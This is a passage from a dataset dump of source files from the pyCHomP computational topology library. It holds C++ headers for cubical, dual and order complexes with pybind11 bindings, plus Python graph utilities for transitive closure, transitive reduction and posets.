"text": "/// Iterator.h\n/// Shaun Harker\n/// 2018-03-10\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Integer.h\"\n\ntemplate < typename I >\nclass IteratorRange {\npublic:\n typedef I iterator;\n typedef I const_iterator;\n IteratorRange ( void ) {}\n IteratorRange ( iterator b, iterator e ) : begin_(b), end_(e) {}\n iterator begin ( void ) const { return begin_;}\n iterator end ( void ) const { return end_;}\n uint64_t size ( void ) const { return end_ - begin_;}\n typename iterator::value_type operator [] ( int64_t i ) const {return *(begin_ + i);}\nprivate:\n iterator begin_;\n iterator end_;\n};\n\nclass CountingIterator {\npublic:\n typedef CountingIterator self_type;\n typedef Integer value_type;\n typedef Integer& reference;\n typedef Integer* pointer;\n typedef Integer difference_type;\n typedef std::forward_iterator_tag iterator_category;\n CountingIterator(void) : val_(0) {}\n CountingIterator(Integer i) : val_(i) { }\n self_type operator++() { return ++ val_; }\n self_type operator++(int) { return val_ ++; }\n self_type operator+(Integer i) const {return CountingIterator(val_ + i);}\n difference_type operator-(self_type const& rhs) const{return val_ - rhs.val_;}\n Integer operator*() const { return val_; }\n //const T* operator->() { return ptr_; }\n self_type operator=(const self_type& other) { val_ = other.val_; return *this; }\n bool operator==(const self_type& rhs)const { return val_ == rhs.val_; }\n bool operator!=(const self_type& rhs)const { return val_ != rhs.val_; }\nprivate:\n int64_t val_;\n};\n\ntypedef CountingIterator Iterator;\ntypedef IteratorRange<Iterator> Range;\n"
},
{
"alpha_fraction": 0.5791106224060059,
"alphanum_fraction": 0.5966907739639282,
"avg_line_length": 20.488889694213867,
"blob_id": "d6c7ddf37f4e3597cfe3db954f93b365706f268b",
"content_id": "8010e43b6985606b1a8371aaa0609ac35f15f553",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 967,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 45,
"path": "/src/pychomp/_chomp/include/OrderComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// OrderComplex.h\n/// Shaun Harker\n/// MIT LICENSE\n/// 2018-03-12\n\n#pragma once\n\n#include \"common.h\"\n#include \"SimplicialComplex.h\"\n\nstd::shared_ptr<SimplicialComplex>\nOrderComplex ( std::shared_ptr<Complex> c ) {\n std::vector<Simplex> simplices;\n std::stack<Simplex> work_stack;\n for ( auto i : *c ) {\n work_stack.push({i});\n while ( not work_stack.empty() ) {\n Simplex s = work_stack.top();\n work_stack.pop();\n auto v = s.back();\n auto bd = c -> boundary({v});\n for ( auto u : bd ) {\n Simplex t = s;\n t.push_back(u);\n work_stack.push(t);\n }\n if ( bd.size() == 0 ) {\n simplices.push_back(s);\n }\n }\n }\n std::shared_ptr<SimplicialComplex> oc ( new SimplicialComplex(simplices) );\n return oc;\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nOrderComplexBinding(py::module &m) {\n m.def(\"OrderComplex\", &OrderComplex);\n}\n"
},
{
"alpha_fraction": 0.5856079459190369,
"alphanum_fraction": 0.6011165976524353,
"avg_line_length": 23.059701919555664,
"blob_id": "e1550268ab707df7b799ea2f2aa8ee7118fbe481",
"content_id": "9e16c740fa2ccf988ac7edd527bdd2d461e5d2b8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1612,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 67,
"path": "/src/pychomp/_chomp/include/DualComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// DualComplex.h\n/// Shaun Harker\n/// 2018-03-12\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Complex.h\"\n\n/// DualComplex\nclass DualComplex : public Complex {\npublic:\n\n DualComplex( std::shared_ptr<Complex> c ) : c_(c) {\n dim_ = c_ -> dimension();\n begin_.resize(dim_+2);\n Integer cumulative = 0;\n for ( Integer d = 0; d <= dim_; ++ d ) {\n begin_[d] = Iterator(cumulative);\n cumulative += c_ -> size(dim_ - d);\n }\n begin_[dim_ + 1] = c_ -> size();\n }\n\n /// dual\n /// Give the dual index of a cell\n Integer \n dual ( Integer x ) const {\n return size() - x - 1;\n }\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const final {\n auto transformed = [&](Integer x){ callback(size() - x - 1); };\n c_ -> row(size() - i - 1, transformed );\n }\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const final {\n auto transformed = [&](Integer x){ callback(size() - x - 1); };\n c_ -> column(size() - i - 1, transformed );\n }\n\nprotected:\n std::shared_ptr<Complex> c_;\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nDualComplexBinding(py::module &m) {\n py::class_<DualComplex, std::shared_ptr<DualComplex>, Complex>(m, \"DualComplex\")\n .def(py::init<std::shared_ptr<Complex>>())\n .def(\"dual\",&DualComplex::dual);\n}\n"
},
{
"alpha_fraction": 0.7263279557228088,
"alphanum_fraction": 0.7355658411979675,
"avg_line_length": 29.928571701049805,
"blob_id": "6567471fe98be6415d74fcdc9097a25a5ef614b0",
"content_id": "ee9ebdc6ecc59f6e5adb09b5b3ade92d2b57bee2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 866,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 28,
"path": "/src/pychomp/_chomp/include/MorseMatching.hpp",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseMatching.hpp\n/// Shaun Harker\n/// 2018-02-23\n/// MIT LICENSE\n\n#include \"MorseMatching.h\"\n#include \"CubicalMorseMatching.h\"\n#include \"GenericMorseMatching.h\"\n\ninline\nstd::shared_ptr<MorseMatching>\nMorseMatching::compute_matching ( std::shared_ptr<Complex> complex ) {\n if ( std::dynamic_pointer_cast<CubicalComplex>(complex) ) {\n return std::make_shared<CubicalMorseMatching>(std::dynamic_pointer_cast<CubicalComplex>(complex));\n } else {\n return std::make_shared<GenericMorseMatching>(complex);\n }\n}\n\ninline\nstd::shared_ptr<MorseMatching>\nMorseMatching::compute_matching ( std::shared_ptr<GradedComplex> graded_complex ) {\n if ( std::dynamic_pointer_cast<CubicalComplex>(graded_complex->complex()) ) {\n return std::make_shared<CubicalMorseMatching>(graded_complex);\n } else {\n return std::make_shared<GenericMorseMatching>(graded_complex);\n }\n}\n"
},
{
"alpha_fraction": 0.5673112869262695,
"alphanum_fraction": 0.5793042778968811,
"avg_line_length": 31.702259063720703,
"blob_id": "fce23bedf1455b7734d0046cf1fd5a1e91b99dbb",
"content_id": "0bec1161a095f0e394f58ca9e56ac0877a927385",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 15926,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 487,
"path": "/src/pychomp/_chomp/include/CubicalComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// CubicalComplex.h\n/// Shaun Harker 2016-12-15-2159\n/// MIT LICENSE\n\n#pragma once\n\n#include \"common.h\"\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n\n// TODO:\n// get rid of interfaces like boxes()[d] in favor of boxes(d)\n\n/// CubicalComplex\n/// Implements a trivial cubical complex with Z_2 coefficients\n/// Methods:\n/// ImageComplex : Initialize the complex with width N and height M\n/// boundary : given a cell, returns an array of boundary cells\n/// coboundary : given a cell, returns an array of coboundary cells\n/// cells : return the set of cells in complex\nclass CubicalComplex : public Complex {\npublic:\n /// CubicalComplex\n /// Default constructor\n CubicalComplex ( void ) {}\n\n /// CubicalComplex\n /// Initialize the complex that is boxes[i] boxes across \n /// in dimensions d = 0, 1, ..., boxes.size() - 1\n /// Note: The cubical complex does not have cells on the \n /// far right, so to have a \"full\" cubical \n /// complex as a subcomplex, pad with an extra box.\n CubicalComplex ( std::vector<Integer> const& boxes ) {\n assign ( boxes );\n }\n\n /// assign\n /// Initialize the complex that is boxes[i] boxes across \n /// in dimensions d = 0, 1, ..., boxes.size() - 1\n void\n assign ( std::vector<Integer> const& boxes ) {\n // Get dimension\n Integer D = boxes.size();\n\n // Compute PV := [1, boxes[0], boxes[0]*boxes[1], ..., boxes[0]*boxes[1]*...*boxes[D-1]]\n auto & PV = place_values_;\n PV.resize ( D+1 );\n PV[0] = 1;\n std::partial_sum (boxes.begin(), boxes.end(), PV.begin() + 1, std::multiplies<Integer>()); \n\n Integer M = 1L << D; // number of types\n Integer L = PV[D]; // Number of cells per shape/type\n Integer N = L * M; // cells per type * number of types\n\n // Set data\n boxes_ = boxes;\n dim_ = D;\n num_types_ = M;\n type_size_ = L;\n\n // Generate shapes and then sort them by dimension (which is bit popcount) to create types.\n // for d = 4: (0D) 0, (1D) 1, 2, 4, 8, (2D) 3, 5, 6, 9, 10, 12, (3D) 7, 11, 13, 14, (4D) 15 (shapes)\n // 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 (types)\n // Implement a bijection between shapes and types via the following arrays:\n auto & ST = shape_from_type_;\n auto & TS = type_from_shape_;\n\n ST.resize ( M );\n TS.resize ( M );\n std::iota(ST.begin(), ST.end(), 0 );\n auto compare = [&](Integer x, Integer y) { return popcount_(x) < popcount_(y); };\n std::stable_sort(ST.begin(), ST.end(), compare);\n for ( Integer type = 0; type < M; ++ type) TS[ST[type]] = type; \n\n // Set up iterator bounds for every dimension\n begin_ . 
resize ( dimension() + 2, N );\n for ( Integer type = 0, idx = 0; type < M; ++ type, idx += L ) {\n Integer shape = ST[type];\n Integer dim = popcount_(shape);\n begin_[dim] = Iterator(std::min(*begin_[dim], idx));\n }\n\n // Set up topstar_offset_ data structure\n topstar_offset_.resize(M);\n for ( Integer i = 0; i < M; ++ i ) {\n topstar_offset_[i] = 0;\n for ( Integer d = 0; d < dimension(); ++ d ) {\n if ( (i & (1L << d)) == 0 ) { \n topstar_offset_[i] -= place_values_[d];\n }\n }\n }\n }\n\n /// column\n virtual void\n column ( Integer cell, std::function<void(Integer)> const& callback ) const final {\n Integer shape = cell_shape(cell);\n Integer position = cell % type_size();\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n // If cell has no extent in this dimension, no boundaries.\n if ( not (shape & bit) ) continue;\n Integer type_offset = type_size() * ( TS() [ shape ^ bit ] );\n callback( position + type_offset );\n // Otherwise, the cell does have extent in this dimension.\n // It is always the case that such a cell has a boundary to the left.\n Integer right_position = position + PV()[d];\n if (right_position >= type_size()) right_position -= type_size();\n callback( right_position + type_offset );\n }\n }\n\n /// row\n virtual void\n row ( Integer cell, std::function<void(Integer)> const& callback ) const final {\n Integer shape = cell_shape(cell);\n Integer position = cell % type_size();\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n // If cell has extent in this dimension, no coboundaries.\n if ( shape & bit ) continue;\n Integer type_offset = type_size() * ( TS() [ shape ^ bit ] );\n callback( position + type_offset );\n Integer left_position = position - PV()[d];\n if (left_position < 0) left_position += type_size();\n callback( left_position + type_offset );\n }\n }\n\n /// topstar\n /// return top dimensional cells in star\n /// note: assumed twisted periodic conditions\n virtual std::vector<Integer>\n topstar ( Integer cell ) const {\n std::vector<Integer> result;\n Integer shape = cell_shape(cell);\n // Loop through dimension()-bit bitcodes\n Integer M = 1L << dimension(); // i.e. 
2^dimension()\n // Compute the topcell x we get by expanding cell to the right in all collapsed dimensions:\n Integer position = cell % type_size(); // (M-1)==(2^D-1) is type of a topcell\n Integer offset = type_size() * (M-1);\n // std::cout << \" cell = \" << cell << \"\\n\";\n // std::cout << \"all-1's topcell = \" << x << \"\\n\";\n for ( Integer i = 0; i < M; ++ i ) {\n if ( (shape & ~i ) == 0 ) { // if shape bit is one, then index i bit must be on.\n // i is a valid offset\n // std::cout << \" shape = \" << shape << \" i == \" << i << \"\\n\";\n // std::cout << \" i = \" << i << \"\\n\";\n // std::cout << \" topstar_offset_[i] = \" << topstar_offset_[i] << \"\\n\";\n result.push_back(offset + (position + topstar_offset_[i] + type_size() ) % type_size());\n } else {\n // TODO skip many invalid indices simultaneously\n }\n }\n return result;\n }\n\n /// parallelneighbors\n /// return top dimensional cells in star\n /// note: assumed twisted periodic conditions\n std::vector<Integer>\n parallelneighbors ( Integer cell ) const {\n Integer shape = cell_shape(cell);\n Integer position = cell % type_size();\n Integer type_offset = type_size() * TS() [ shape ];\n std::vector<Integer> result;\n auto record = [&](Integer offset) {\n Integer k = position + offset;\n if ( k >= type_size()) k -= type_size(); else if ( k < 0 ) k += type_size();\n result.push_back(k + type_offset);\n };\n auto D = dimension();\n std::vector<int> x(D, -1);\n Integer offset = 0;\n for ( Integer d = 0, bit = 1; d < D; ++ d, bit <<= (Integer) 1 ) if ( shape & bit ) offset -= PV()[d];\n record(offset);\n while (1) {\n for ( Integer d = 0, bit = 1; d <= D; ++ d, bit <<= (Integer) 1 ) {\n if ( d == D ) return result;\n if ( shape & bit ) {\n if ( ++x[d] == 2 ) { \n x[d] = -1; \n offset -= 2*PV()[d];\n } else { \n offset += PV()[d];\n record(offset);\n break;\n }\n }\n }\n }\n }\n\n /// Features\n\n /// left\n /// Give cell to \"left\" in given dimension. \n /// Note: uses \"twisted\" periodic boundary conditions (inconsistent with periodic and acyclic conditions)\n Integer\n left ( Integer cell, Integer dim ) const {\n Integer shape = cell_shape(cell);\n Integer bit = ((Integer)1) << dim;\n Integer position = cell % type_size();\n Integer type_offset = type_size() * TS() [ shape ^ bit ];\n if ( not (shape & bit) ) position -= PV()[dim];\n if (position < 0) position += type_size();\n return position + type_offset;\n }\n\n /// right\n /// Give cell to \"right\" in given dimension. 
\n /// Note: uses \"twisted\" periodic boundary conditions (inconsistent with periodic and acyclic conditions)\n Integer\n right ( Integer cell, Integer dim ) const {\n Integer shape = cell_shape(cell);\n Integer bit = ((Integer)1) << dim;\n Integer position = cell % type_size();\n Integer type_offset = type_size() * TS() [ shape ^ bit ];\n if ( (shape & bit) ) position += PV()[dim];\n if (position >= type_size()) position -= type_size();\n return position + type_offset;\n }\n\n /// leftfringe\n /// cells for which left coboundary wraps around if periodic\n bool\n leftfringe ( Integer cell ) const {\n Integer shape = cell_shape(cell);\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( (shape & bit) ) continue;\n if ( coordinate.rem == 0 ) return true;\n }\n return false;\n }\n\n /// rightfringe\n /// Return true if right boundary would wrap around if periodic \n bool\n rightfringe ( Integer cell ) const {\n Integer shape = cell_shape(cell);\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( not (shape & bit) ) continue;\n if ( coordinate.rem + 1 == boxes()[d]) return true;\n }\n return false;\n }\n\n /// mincoords\n /// Return integer with 2^i bit set for each dimension i for which \n /// cell is at maximum coordinate for dimension i\n Integer\n mincoords ( Integer cell ) const {\n Integer result = 0;\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( coordinate.rem == 0 ) result |= bit;\n }\n return result;\n }\n\n /// maxcoords\n /// Return integer with 2^i bit set for each dimension i for which \n /// cell is at maximum coordinate for dimension i\n Integer\n maxcoords ( Integer cell ) const {\n Integer result = 0;\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( coordinate.rem + 1 == boxes()[d]) result |= bit;\n }\n return result;\n }\n\n /// boxes\n /// Number of boxes across in each dimension\n std::vector<Integer> const&\n boxes ( void ) const {\n return boxes_;\n }\n\n /// coordinates\n /// Given a cell index, \n /// returns ( x_0, x_1, ..., x_{dim-1} )\n std::vector<Integer>\n coordinates ( Integer cell ) const {\n std::vector<Integer> result ( dimension() );\n for ( Integer d = 0; d < dimension(); ++ d ) {\n result[d] = cell % boxes()[d];\n cell /= boxes()[d];\n }\n return result;\n }\n\n /// barycenter\n /// Give integer barycenter ( doubled coordinates with +1 for directions with extent)\n std::vector<Integer>\n barycenter ( Integer cell ) const {\n auto result = coordinates(cell);\n auto shape = cell_shape(cell);\n for ( Integer i = 0, bit = 1; i < dimension(); ++ i, bit <<= (Integer) 1 ) {\n result[i] <<= (Integer) 1;\n if ( shape & bit ) result[i] += 1;\n }\n return result;\n }\n\n /// shape_begin\n Iterator\n shape_begin ( Integer shape ) const {\n return Iterator(TS()[shape] * type_size());\n }\n\n /// shape_end\n Iterator\n shape_end 
( Integer shape ) const {\n return Iterator(TS()[shape] * ( type_size() + 1));\n }\n\n /// cell_type\n /// Give shape code\n /// Interpretation: if ( shape & ( 1 << i ) ) { then the cell has extent in dimension i }\n Integer\n cell_type ( Integer cell ) const {\n return cell / type_size();\n }\n\n /// cell_shape\n /// Give shape code\n /// Interpretation: if ( shape & ( 1 << i ) ) { then the cell has extent in dimension i }\n Integer\n cell_shape ( Integer cell ) const {\n Integer shape = ST() [ cell_type(cell) ]; \n return shape;\n }\n\n /// cell_pos\n Integer\n cell_pos ( Integer cell ) const {\n return cell % type_size();\n }\n\n /// cell_index\n Integer\n cell_index ( std::vector<Integer> const& coordinates, \n Integer shape ) {\n Integer cell = 0;\n for ( Integer d = dimension() - 1; d >= 0; -- d ) {\n cell *= boxes()[d];\n cell += coordinates[d];\n }\n cell += TS() [ shape ] * type_size();\n return cell;\n }\n\n /// cell_dim\n /// Return dimension of cell\n Integer\n cell_dim ( Integer cell ) const {\n return popcount_(cell_shape(cell));\n }\n\n /// operator ==\n bool\n operator == ( CubicalComplex const& rhs ) const {\n return boxes() == rhs.boxes();\n }\n\n /// operator <\n bool\n operator < ( CubicalComplex const& rhs ) const {\n return std::lexicographical_compare(boxes().begin(), boxes().end(),\n rhs.boxes().begin(), rhs.boxes().end());\n }\n\n /// operator <<\n friend std::ostream & operator << ( std::ostream & stream, CubicalComplex const& stream_me ) {\n stream << \"CubicalComplex([\";\n for ( auto x : stream_me.boxes() ) stream << x << \",\";\n return stream << \"])\";\n }\n\n /// print_cell (for debugging )\n void\n print_cell (Integer cell_index) const {\n std::cout << cell_index << \"\\n\";\n std::cout << \" coordinates(\" << cell_index << \") = [\";\n for ( auto x : coordinates(cell_index) ) std::cout << x << \", \"; std::cout << \"]\\n\";\n std::cout << \" shape(\" << cell_index << \") = \" << cell_shape(cell_index) << \"\\n\";\n }\n\n Integer\n type_size ( void ) const {\n return type_size_;\n }\n\n /// TS\n /// Given shape, return type\n std::vector<Integer> const&\n TS ( void ) const {\n return type_from_shape_;\n }\n\n /// TS\n /// Given type, return shape\n std::vector<Integer> const&\n ST ( void ) const {\n return shape_from_type_;\n }\n\n /// PV\n /// Return \n std::vector<Integer> const&\n PV ( void ) const {\n return place_values_;\n }\n\nprivate:\n\n Integer\n popcount_ ( Integer x ) const {\n // http://lemire.me/blog/2016/05/23/the-surprising-cleverness-of-modern-compilers/\n Integer pcnt = 0; \n while(x != 0) { x &= x - 1; ++pcnt; } \n return pcnt;\n }\nprivate:\n std::vector<Integer> boxes_;\n std::vector<Integer> place_values_;\n std::vector<Integer> shape_from_type_;\n std::vector<Integer> type_from_shape_;\n std::vector<Integer> topstar_offset_;\n Integer num_types_;\n Integer type_size_;\n};\n\n/// std::hash<CubicalComplex>\nnamespace std {\n template<> struct hash<CubicalComplex> {\n typedef CubicalComplex argument_type;\n typedef std::size_t result_type;\n result_type operator()(argument_type const& complex) const {\n using pychomp::hash_value;\n using pychomp::hash_combine;\n std::size_t seed = 0;\n for ( auto x : complex.boxes() ) {\n hash_combine(seed,hash_value(x));\n } \n return seed;\n }\n };\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nCubicalComplexBinding(py::module &m) {\n py::class_<CubicalComplex, std::shared_ptr<CubicalComplex>, Complex>(m, 
\"CubicalComplex\")\n .def(py::init<>())\n .def(py::init<std::vector<Integer> const&>())\n .def(\"boxes\", &CubicalComplex::boxes)\n .def(\"coordinates\", &CubicalComplex::coordinates)\n .def(\"barycenter\", &CubicalComplex::barycenter) \n .def(\"cell_type\", &CubicalComplex::cell_type)\n .def(\"cell_shape\", &CubicalComplex::cell_shape)\n .def(\"cell_pos\", &CubicalComplex::cell_pos)\n .def(\"cell_dim\", &CubicalComplex::cell_dim)\n .def(\"cell_index\", &CubicalComplex::cell_index)\n .def(\"left\", &CubicalComplex::left)\n .def(\"right\", &CubicalComplex::right)\n .def(\"leftfringe\", &CubicalComplex::leftfringe)\n .def(\"rightfringe\", &CubicalComplex::rightfringe)\n .def(\"mincoords\", &CubicalComplex::mincoords)\n .def(\"maxcoords\", &CubicalComplex::maxcoords)\n .def(\"parallelneighbors\", &CubicalComplex::parallelneighbors);\n}\n"
},
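The shape/type bookkeeping in assign() above is easy to sanity-check on its own. Below is a minimal Python sketch (not part of the repo) that reproduces the place values PV and the ST/TS bijection; the box counts [3, 4, 5] are made up for the example.

from itertools import accumulate
from operator import mul

def assign(boxes):
    D = len(boxes)
    PV = [1] + list(accumulate(boxes, mul))   # place values, as in the header
    M = 1 << D                                # number of shapes/types
    # Python's sort is stable, matching the std::stable_sort in assign().
    ST = sorted(range(M), key=lambda s: bin(s).count("1"))  # shape_from_type_
    TS = [0] * M
    for t, s in enumerate(ST):
        TS[s] = t                             # type_from_shape_
    return PV, ST, TS

PV, ST, TS = assign([3, 4, 5])
print(PV)   # [1, 3, 12, 60]
print(ST)   # shapes grouped by popcount: [0, 1, 2, 4, 3, 5, 6, 7]
assert all(TS[ST[t]] == t for t in range(len(ST)))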
{
"alpha_fraction": 0.6087431907653809,
"alphanum_fraction": 0.6174863576889038,
"avg_line_length": 31.678571701049805,
"blob_id": "58fac7cc40de7e1d3d990faf46ec9ae91b1f9a64",
"content_id": "0e8d920b2fb770b5cc5dc1d08a9b015ba8c39d59",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 915,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 28,
"path": "/src/pychomp/TransitiveClosure.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# TransitiveClosure.py\n# Shaun Harker\n# MIT LICENSE\n# 2018-03-10\n\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.TopologicalSort import *\n\ndef TransitiveClosure( G ):\n \"\"\" Return a new graph which is the transitive reduction of a DAG G \"\"\"\n # Algorithm. Compute longest-path distance between each pair of vertices. \n # Then, construct a graph consisting length-one longest paths.\n TS = TopologicalSort(G.vertices(), G.adjacencies)\n result = DirectedAcyclicGraph()\n for v in G.vertices():\n result.add_vertex(v) \n for v in G.vertices():\n # Find vertices reachable from from v\n reachable = set()\n reachable.add(v)\n for u in reversed(TS):\n if u in reachable:\n for w in G.adjacencies(u):\n reachable.add(w)\n for u in reachable:\n if u != v:\n result.add_edge(v, u)\n return result\n"
},
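For readers without the pychomp helpers at hand, the same reverse-topological-order sweep can be written against a plain adjacency dict. A self-contained sketch (the three-vertex chain is made up for the example):

def transitive_closure(adj):
    # Kahn-style topological order of a DAG given as {vertex: set_of_successors}.
    order, indeg = [], {v: 0 for v in adj}
    for v in adj:
        for w in adj[v]:
            indeg[w] += 1
    stack = [v for v in adj if indeg[v] == 0]
    while stack:
        v = stack.pop()
        order.append(v)
        for w in adj[v]:
            indeg[w] -= 1
            if indeg[w] == 0:
                stack.append(w)
    # Sweep in reverse order, accumulating reachable sets.
    reach = {v: set() for v in adj}
    for v in reversed(order):
        for w in adj[v]:
            reach[v] |= {w} | reach[w]
    return reach

print(transitive_closure({0: {1}, 1: {2}, 2: set()}))  # {0: {1, 2}, 1: {2}, 2: set()}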
{
"alpha_fraction": 0.5632529854774475,
"alphanum_fraction": 0.5763052105903625,
"avg_line_length": 33.31034469604492,
"blob_id": "c78b45e91b352172dd378533b2c6bed0eeb975fb",
"content_id": "98d3a89e3dbe3a28b4c19093fa7925e2fd730535",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 996,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 29,
"path": "/src/pychomp/TransitiveReduction.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# TransitiveReduction.py\n# Shaun Harker\n# MIT LICENSE\n# 2018-03-10\n\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.TopologicalSort import *\n\ndef TransitiveReduction( G ):\n \"\"\" Return a new graph which is the transitive reduction of a DAG G \"\"\"\n # Algorithm. Compute longest-path distance between each pair of vertices. \n # Then, construct a graph consisting length-one longest paths.\n TS = TopologicalSort(G.vertices(), G.adjacencies)\n result = DirectedAcyclicGraph()\n for v in G.vertices():\n result.add_vertex(v) \n for v in G.vertices():\n # Find single-source longest paths from v\n lp = { u : -1 for u in G.vertices() }\n lp[v] = 0\n for u in reversed(TS):\n val = lp[u]\n if val >= 0:\n for w in G.adjacencies(u):\n if u != w:\n lp[w] = max(val + 1, lp[w])\n for u in [ w for w in lp if lp[w] == 1 ]:\n result.add_edge(v, u)\n return result\n\n"
},
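The criterion the module applies, namely keep edge (v, u) exactly when the longest path from v to u has length one, can be checked on a small hand-made DAG. A standalone sketch, with the topological order supplied by hand:

def transitive_reduction_edges(vertices, adj, topo):
    # topo must list each vertex before anything that points to it, so that
    # reversed(topo) visits sources before targets, as in the module above.
    edges = []
    for v in vertices:
        lp = {u: -1 for u in vertices}   # single-source longest paths from v
        lp[v] = 0
        for u in reversed(topo):
            if lp[u] >= 0:
                for w in adj[u]:
                    lp[w] = max(lp[u] + 1, lp[w])
        edges.extend((v, u) for u in vertices if lp[u] == 1)
    return edges

# Diamond with a shortcut: edge a->d is implied by a->b->d, so it is dropped.
adj = {'a': {'b', 'c', 'd'}, 'b': {'d'}, 'c': {'d'}, 'd': set()}
topo = ['d', 'c', 'b', 'a']
print(sorted(transitive_reduction_edges(adj, adj, topo)))
# [('a', 'b'), ('a', 'c'), ('b', 'd'), ('c', 'd')]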
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.8079208135604858,
"avg_line_length": 32.53333282470703,
"blob_id": "8b8bdc596fa9304c8f91dd2a5c326c99c4c0dc4f",
"content_id": "1c8573df481d17825d45b7790d0fd74e1c9fb787",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 15,
"path": "/src/pychomp/__init__.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### __init__.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp._chomp import *\n#from pychomp.Braids import *\nfrom pychomp.CondensationGraph import *\nfrom pychomp.FlowGradedComplex import *\nfrom pychomp.TopologicalSort import *\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.InducedSubgraph import *\nfrom pychomp.TransitiveReduction import *\nfrom pychomp.TransitiveClosure import *\nfrom pychomp.Poset import *\nfrom pychomp.StronglyConnectedComponents import *\nfrom pychomp.DrawGradedComplex import *\n\n\n"
},
{
"alpha_fraction": 0.6183172464370728,
"alphanum_fraction": 0.6200700998306274,
"avg_line_length": 25.546510696411133,
"blob_id": "c1f7e8963fbb1e6142948b924c16729e1fffdb41",
"content_id": "b060369bc8d178a85773864cfb5ced6bce96633b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2282,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 86,
"path": "/src/pychomp/Poset.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### Poset.py\n### MIT LICENSE 2016 Shaun Harker\n\nimport graphviz\n\nclass Poset:\n \"\"\"\n Represents a poset\n \"\"\"\n def __init__(self, graph):\n \"\"\" \n Create a Poset P from a DAG G such that x <= y in P iff there is a path from x to y in G \n \"\"\"\n self.vertices_ = set(graph.vertices())\n #self.descendants_ = graph.transitive_closure()\n #self.ancestors_ = self.descendants_.transpose()\n self.children_ = graph.transitive_reduction()\n self.parents_ = self.children_.transpose()\n\n def __iter__(self):\n \"\"\"\n Allows for the semantics\n [v for v in poset]\n \"\"\"\n return iter(self.vertices())\n\n def vertices(self):\n \"\"\" \n Return the set of elements in the poset \n \"\"\"\n return self.vertices_\n \n def parents(self, v):\n \"\"\" \n Return the immediate predecessors of v in the poset \n \"\"\"\n return self.parents_.adjacencies(v)\n \n def children(self, v):\n \"\"\" \n Return the immediate successors of v in the poset \n \"\"\"\n return self.children_.adjacencies(v)\n \n def ancestors(self, v):\n \"\"\" \n Return the set { u : u < v } \n \"\"\"\n return self.ancestors_.adjacencies(v)\n \n def descendants(self, v):\n \"\"\" \n Return the set { u : v 